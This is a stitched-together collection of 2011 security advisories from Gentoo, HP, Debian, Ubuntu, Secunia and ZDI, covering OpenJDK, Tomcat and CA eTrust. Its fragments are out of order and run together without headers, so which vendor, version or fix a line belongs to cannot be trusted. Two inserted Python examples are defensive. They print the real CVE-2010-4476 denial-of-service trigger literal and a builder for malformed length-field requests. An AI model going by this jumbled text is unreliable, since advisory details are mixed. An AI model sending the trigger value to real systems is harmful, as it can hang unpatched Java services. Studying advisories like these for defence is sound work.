http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 31 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 32 ] CVE-2010-4451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451
[ 33 ] CVE-2010-4452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452
[ 34 ] CVE-2010-4454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454
[ 35 ] CVE-2010-4462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462
[ 36 ] CVE-2010-4463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463
[ 37 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 38 ] CVE-2010-4466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466
[ 39 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 40 ] CVE-2010-4468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468
[ 41 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 42 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 43 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 44 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 45 ] CVE-2010-4473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473
[ 46 ] CVE-2010-4474
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474
[ 47 ] CVE-2010-4475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475
[ 48 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 49 ] CVE-2011-0802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802
[ 50 ] CVE-2011-0814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814
[ 51 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 52 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 53 ] CVE-2011-0863
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863
[ 54 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 55 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 56 ] CVE-2011-0867
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867
[ 57 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 58 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 59 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 60 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 61 ] CVE-2011-0873
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873
[ 62 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 63 ] CVE-2011-3516
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516
[ 64 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 65 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 66 ] CVE-2011-3545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545
[ 67 ] CVE-2011-3546
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546
[ 68 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 69 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 70 ] CVE-2011-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549
[ 71 ] CVE-2011-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550
[ 72 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 73 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 74 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 75 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 76 ] CVE-2011-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555
[ 77 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 78 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 79 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 80 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 81 ] CVE-2011-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
For technical reasons, this update will be released separately.
The updates are available from: http://www.hp.com/go/java
These issues are addressed in the following versions of the HP Java:
HP-UX B.11.11 / SDK and JRE v1.4.2.28 or subsequent
HP-UX B.11.23 / SDK and JRE v1.4.2.28 or subsequent
HP-UX B.11.31 / SDK and JRE v1.4.2.28 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v1.4.2.27 and earlier, update to Java v1.4.2.28 or subsequent.
----------------------------------------------------------------------
TITLE:
Apache Tomcat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43198
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43198/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43198
RELEASE DATE:
2011-02-07
DESCRIPTION:
Multiple vulnerabilities have been reported in Apache Tomcat, which
can be exploited by malicious, local users to bypass certain security
restrictions and by malicious people to conduct cross-site scripting
attacks and cause a DoS (Denial of Service).
1) An error due to the "ServletContext" attribute not being properly
restricted to read-only when running under a SecurityManager can be
exploited by a malicious web application to use an arbitrary working
directory with read-write privileges.
2) Certain input (e.g. display names) is not properly sanitised in
the HTML Manager interface before being returned to the user.
3) An error within the JVM when accessing a page that calls
"javax.servlet.ServletRequest.getLocale()" or
"javax.servlet.ServletRequest.getLocales()" functions can be
exploited to cause the process to hang via a web request containing
specially crafted headers (e.g. "Accept-Language").
The vulnerabilities are reported in versions prior to 5.5.33.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Reported by the vendor.
3) Konstantin Preiber
ORIGINAL ADVISORY:
Apache Tomcat:
http://tomcat.apache.org/security-5.html
http://archives.neohapsis.com/archives/fulldisclosure/2011-02/0075.html
Konstantin Preiber:
http://www.exploringbinary.com/why-volatile-fixes-the-2-2250738585072011e-308-bug/comment-page-1/#comment-4645
HP OpenVMS running J2SE 1.42 on Alpha platforms: v 1.42-9 and earlier.
HP OpenVMS running J2SE 1.42 on I64 platforms: v 1.42-6 and earlier.
HP OpenVMS running J2SE 5.0 on Alpha platforms: v 1.50-7 and earlier.
HP OpenVMS running J2SE 5.0 on I64 platforms: v 1.50-6 and earlier.
HP OpenVMS running Java SE 6 on Alpha and I64 platforms: v 6.0-2 and earlier.
Such input strings represent valid numbers and can be contained in
data supplied by an attacker over the network, leading to a
denial-of-service attack.
For the old stable distribution (lenny), this problem has been fixed
in version 6b18-1.8.3-2~lenny1.
Note that this update introduces an OpenJDK package based on the
IcedTea release 1.8.3 into the old stable distribution. This
addresses several dozen security vulnerabilities, most of which are
only exploitable by malicious mobile code. A notable exception is
CVE-2009-3555, the TLS renegotiation vulnerability. This update
implements the protocol extension described in RFC 5746, addressing
this issue.
This update also includes a new version of Hotspot, the Java virtual
machine, which increases the default heap size on machines with
several GB of RAM. If you run several JVMs on the same machine, you
might have to reduce the heap size by specifying a suitable -Xmx
argument in the invocation of the "java" command.
We recommend that you upgrade your openjdk-6 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
The Tomcat-based Servlet Engine is contained in the HP-UX Apache Web Server Suite.
The updates are available for download from http://software.hp.com
Note: HP-UX Web Server Suite v3.20 contains HP-UX Tomcat-based Servlet Engine v5.5.34.01
Web Server Suite Version        HP-UX release    Apache Depot name
HP-UX Web Server Suite v.3.20   HP-UX B.11.23    HPUXWS22ATW-B320-64.depot
HP-UX Web Server Suite v.3.20   HP-UX B.11.23    HPUXWS22ATW-B320-32.depot
HP-UX Web Server Suite v.3.20   HP-UX B.11.31    HPUXWS22ATW-B320-64.depot
HP-UX Web Server Suite v.3.20   HP-UX B.11.31    HPUXWS22ATW-B320-32.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.20 or subsequent.
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02729756
Version: 1
HPSBUX02633 SSRT100387 rev.1 - HP-UX running Java, Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2011-02-23
Last Updated: 2011-02-23
------------------------------------------------------------------------------
Potential Security Impact: Remote Denial of Service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP-UX running Java. The vulnerability could be remotely exploited to create a Denial of Service (DoS).
References: CVE-2010-4476
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Any version of Java running on HP-UX 11.11, HP-UX 11.23, or HP-UX 11.31.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software tool available to resolve the vulnerability. This tool can be used to update all versions of HP-UX Java.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool
An HP Passport user ID is required to download the FPUpdater tool and its Readme file. For information on registering for an HP Passport user ID, refer to: https://passport2.hp.com
MANUAL ACTIONS: Yes - Update
Update using FPUpdater
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
===========
action: update using FPUpdater if Java is installed
END AFFECTED VERSIONS
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
HISTORY
Version:1 (rev.1) - 23 February 2011 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAk1sQl4ACgkQ4B86/C0qfVkZoACg+A0Nrllhsgj+ZNVRWBJtSGg0
+McAoLe5aV6VZ16dYIp6IG59vPG8unq8
=sL4p
-----END PGP SIGNATURE-----
===========================================================
Ubuntu Security Notice USN-1079-3 March 17, 2011
openjdk-6b18 vulnerabilities
CVE-2010-4448, CVE-2010-4450, CVE-2010-4465, CVE-2010-4469,
CVE-2010-4470, CVE-2010-4471, CVE-2010-4472, CVE-2010-4476,
CVE-2011-0706
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 10.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 10.10:
icedtea6-plugin 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre 6b18-1.8.7-0ubuntu2.1
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu2.1
After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.
Details follow:
USN-1079-2 fixed vulnerabilities in OpenJDK 6 for armel (ARM)
architectures in Ubuntu 9.10 and Ubuntu 10.04 LTS. This update fixes
vulnerabilities in OpenJDK 6 for armel (ARM) architectures for Ubuntu
10.10.
Original advisory details:
It was discovered that untrusted Java applets could create domain
name resolution cache entries, allowing an attacker to manipulate
name resolution within the JVM. (CVE-2010-4448)
It was discovered that the Java launcher did not properly set up
the LD_LIBRARY_PATH environment variable. A local attacker
could exploit this to execute arbitrary code as the user invoking
the program. (CVE-2010-4450)
It was discovered that within the Swing library, forged timer events
could allow bypass of SecurityManager checks. This could allow an
attacker to access restricted resources. (CVE-2010-4465)
It was discovered that certain bytecode combinations confused memory
management within the HotSpot JVM. This could allow an attacker to
cause a denial of service through an application crash or possibly
inject code. (CVE-2010-4469)
It was discovered that the way JAXP components were handled
allowed them to be manipulated by untrusted applets. An attacker
could use this to bypass XML processing restrictions and elevate
privileges. (CVE-2010-4470)
It was discovered that the Java2D subcomponent, when processing broken
CFF fonts could leak system properties. (CVE-2010-4471)
It was discovered that a flaw in the XML Digital Signature
component could allow an attacker to cause untrusted code to
replace the XML Digital Signature Transform or C14N algorithm
implementations. (CVE-2010-4472)
Konstantin Preißer and others discovered that specific double literals
were improperly handled, allowing a remote attacker to cause a denial
of service. (CVE-2010-4476)
It was discovered that the JNLPClassLoader class when handling multiple
signatures allowed remote attackers to gain privileges due to the
assignment of an inappropriate security descriptor. (CVE-2011-0706)
Updated packages for Ubuntu 10.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.diff.gz
Size/MD5: 149561 b35ae7a82db49282379d36e7ece58484
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu2.1.dsc
Size/MD5: 3015 04cb459aeaab6c228e722caf07a44de9
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 377802 d4439da20492eafbccb33e2fe979e8c9
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 78338 7bdf93e00fd81dc82fd0d9a8b4e905c7
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 85497146 1512e0d6563dd5120729cf5b993c618c
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1545620 544c54891d44bdac534c81318a7f2bcb
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 9140042 0a2d6ed937081800baeb6fc55326a754
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 30092886 4cc5ad7c54638278e55ee7d2acaab413
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 266102 4278c2c06387cf883325356efda3c4d4
http://ports.ubuntu.com/pool/universe/o/openjdk-6b18/openjdk-6-jre-zero_6b18-1.8.7-0ubuntu2.1_armel.deb
Size/MD5: 1959296 6becfb4d5a2ecbe7aee622b84df57f12
Customers should open a support case to request the following hotfixes.
NNMi Version / Operating System   Required Patch   Hotfix
9.1x HP-UX                        Patch 4          Hotfix-NNMi-9.1xP4-HP-UX-JDK-20120710.zip
9.1x Linux                        Patch 4          Hotfix-NNMi-9.1xP4-Linux-JDK-20120523.zip
9.1x Solaris                      Patch 4          Hotfix-NNMi-9.1xP4-Solaris-JDK-20120523.zip
9.1x Windows                      Patch 4          Hotfix-NNMi-9.1xP4-Windows-JDK-20120523.zip
Note: The hotfix must be installed after the required patch. The hotfix must
be reinstalled if the required patch is reinstalled.
MANUAL ACTIONS: Yes - Update
Install the applicable patch and hotfix. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools.
The vulnerability is caused due to an error in the "doubleValue()"
method in FloatingDecimal.java when converting
"2.2250738585072012e-308" from a string type to a double precision
binary floating point and can be exploited to cause an infinite
loop.
* Sun JDK 5.0 Update 27 and prior.
* Sun SDK 1.4.2_29 and prior.
SOLUTION:
Apply patch via the FPUpdater tool
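The infinite loop described above, and in the USN-1079-3 entry for CVE-2010-4476 (the "specific double literals" paragraph), is triggered by decimal strings whose value sits at the boundary between the largest subnormal and the smallest normal double. As an added example, not code from Sun, OpenJDK, Ubuntu or Secunia, the following Python filter rejects such strings before they reach Double.parseDouble(), using exact rational arithmetic so that no floating-point parser is involved at all. The width of the blocked window (one subnormal ulp, 2**-1074, either side of 2**-1022) is an assumption chosen to be conservative; it also catches the canonical spelling of Double.MIN_NORMAL, which a request filter can tolerate.

```python
from fractions import Fraction

# Added example (not from the advisory or from Sun/OpenJDK code): a pre-parse
# filter for decimal strings that hang FloatingDecimal.doubleValue()
# (CVE-2010-4476). The window below is an assumption: one subnormal ulp
# (2**-1074) either side of the smallest normal double 2**-1022
# (2.2250738585072014e-308), the region where the buggy rounding loop fails
# to converge.
DBL_MIN = Fraction(2) ** -1022        # smallest normal IEEE-754 double
SUBNORMAL_ULP = Fraction(2) ** -1074  # spacing between adjacent subnormals
DANGER_LOW = DBL_MIN - SUBNORMAL_ULP
DANGER_HIGH = DBL_MIN + SUBNORMAL_ULP


def exact_decimal_value(text):
    """Exact rational value of a decimal literal, or None if it is not one.

    Fraction() parses sign, digits, '.' and an exponent exactly, so no float
    conversion (and therefore no vulnerable parser) runs here.  A trailing
    Java-style suffix (d, D, f, F) is stripped so that "...e-308d" is
    classified the same way as the bare literal.
    """
    s = text.strip()
    if s and s[-1] in "dDfF":
        s = s[:-1]
    try:
        return Fraction(s)
    except (ValueError, ZeroDivisionError):
        return None


def is_java_double_dos_literal(text):
    """True if handing `text` to Double.parseDouble() could hang an unpatched JVM."""
    value = exact_decimal_value(text)
    if value is None:
        return False
    return DANGER_LOW <= abs(value) <= DANGER_HIGH


def scrub_numeric_fields(fields):
    """Names of request fields (a dict of name -> raw string) that must be
    rejected before the application converts them to double."""
    return [name for name, raw in fields.items() if is_java_double_dos_literal(raw)]
```

Apply it to anything the application will convert with Double.parseDouble() or Double.valueOf(): form values, JSON numbers, and HTTP headers such as Accept-Language q-values, on any JVM that has not received the FPUpdater fix. Variants with extra zeros or a shifted exponent ("0.00022250738585072012e-304") have the same exact value and are caught by the same comparison.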
| VAR-201102-0158 | CVE-2011-0758 | CA ETrust Secure Content Manager and CA Gateway Securit of eCS In the component Service operation interruption (DoS) Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The eCS component (ECSQdmn.exe) in CA ETrust Secure Content Manager 8.0 and CA Gateway Security 8.1 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a crafted request to port 1882, involving an incorrect integer calculation and a heap-based buffer overflow. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Computer Associates eTrust Secure Content Manager. Authentication is not required to exploit this vulnerability.
The specific flaw exists in the eTrust Common Services Transport (ECSQdmn.exe) running on port 1882. When making a request to this service, a user-supplied DWORD value is used in a memory copy operation. Due to the lack of bounds checking, an integer can be improperly calculated, leading to a heap overflow. If successfully exploited, this vulnerability will result in a remote system compromise with SYSTEM credentials. Failed exploit attempts will result in a denial-of-service condition.
TITLE:
CA Secure Content Manager Common Services Transport Vulnerability
SECUNIA ADVISORY ID:
SA43200
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43200/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43200
RELEASE DATE:
2011-02-10
DISCUSS ADVISORY:
http://secunia.com/advisories/43200/#comments
DESCRIPTION:
A vulnerability has been reported in CA Secure Content Manager, which
can be exploited by malicious people to compromise a vulnerable
system.
The vulnerability is caused due to missing input validation in the
eTrust Common Services Transport (ECSQdmn.exe) service when parsing
requests and can be exploited to cause a heap-based buffer overflow
via a specially crafted request sent to port 1882.
* CA Gateway Security version 8.1.
SOLUTION:
Restrict access to the affected service.
PROVIDED AND/OR DISCOVERED BY:
Sebastian Apelt via ZDI.
ORIGINAL ADVISORY:
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-059/
CA:
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={EE6F16E1-6E05-4890-A739-2B9F745C721F}
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
ZDI-11-059: CA ETrust Secure Content Manager Common Services Transport Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-059
February 7, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. To view mitigations for this vulnerability please see: http://dvlabs.tippingpoint.com/blog/2011/02/07/zdi-disclosure-ca
-- CVE ID:
CVE-2011-0758
-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
-- Affected Vendors:
CA
-- Affected Products:
CA eTrust Secure Content Manager
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6184. Authentication is not required to exploit this vulnerability.
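The flaw class described in this entry (a user-supplied DWORD length that is "improperly calculated" before a memory copy) is a length check that wraps around in 32-bit arithmetic. As an added example, not CA's code and not the real wire format of the Common Services Transport (which the advisories do not document), the following Python models a hypothetical request layout of a 4-byte tag plus a 4-byte little-endian length, shows the naive check that a huge DWORD slips past, and the check that cannot wrap. The "ECSQ" tag and the sample messages are constructed for illustration.

```python
import struct

# Added example (not CA's code). The header layout is a hypothetical stand-in
# for the undocumented ECSQdmn.exe request format: a 4-byte tag and a 4-byte
# little-endian payload length (the attacker-controlled DWORD), then the payload.
HDR = struct.Struct("<4sI")
MAX_PAYLOAD = 4096          # size of the heap buffer the payload is copied into
U32 = 0xFFFFFFFF


def naive_fits(declared_len):
    """The flawed check: adds the header size in DWORD arithmetic, then compares.

    A declared length close to 2**32 wraps to a small number, passes the test,
    and the later copy still uses the original huge length against a
    MAX_PAYLOAD-sized heap buffer.
    """
    total = (declared_len + HDR.size) & U32     # carries discarded, as in C
    return total <= MAX_PAYLOAD + HDR.size


def naive_copy_length(msg):
    """What the flawed code would hand to the memory copy: None if the naive
    check rejects the message, otherwise the untrusted DWORD itself."""
    _tag, declared_len = HDR.unpack_from(msg)
    return declared_len if naive_fits(declared_len) else None


def safe_fits(declared_len, received_len):
    """Bounds check that cannot wrap: compare the raw value against the
    buffer limit first, then against the bytes actually received."""
    if declared_len > MAX_PAYLOAD:
        return False
    if received_len < HDR.size:
        return False
    return declared_len <= received_len - HDR.size


def parse_request(msg):
    """Return (tag, payload) or raise ValueError; never trusts declared_len alone."""
    if len(msg) < HDR.size:
        raise ValueError("short header")
    tag, declared_len = HDR.unpack_from(msg)
    if not safe_fits(declared_len, len(msg)):
        raise ValueError(f"rejected declared length {declared_len:#x}")
    return tag, msg[HDR.size:HDR.size + declared_len]


def build_request(tag, payload, declared_len=None):
    """Constructed test input: lets the declared DWORD disagree with the real size."""
    if declared_len is None:
        declared_len = len(payload)
    return HDR.pack(tag, declared_len) + payload
```

The same two rules carry over to the C that actually runs in the service: compare the untrusted value against the fixed limit before doing any arithmetic on it, and never let a length exceed the number of bytes that arrived.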
-- Disclosure Timeline:
2008-05-23 - Vulnerability reported to vendor
2011-02-07 - Public release of advisory
-- Credit:
This vulnerability was discovered by:
* Sebastian Apelt (sebastian.apelt@siberas.de)
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0385 | No CVE | Hitachi Tuning Manager Unknown Cross-Site Scripting Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Hitachi Tuning Manager is an automated, intelligent and path-aware storage resource management software that monitors, analyzes and audits the performance of storage network resources from applications to storage devices. Hitachi Tuning Manager has multiple input validation issues that remote attackers can exploit for cross-site scripting attacks to obtain sensitive information or hijack target users' sessions.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Hitachi Tuning Manager versions 6.0.0 through 6.4.0-01 and 7.0.0 are vulnerable.
----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
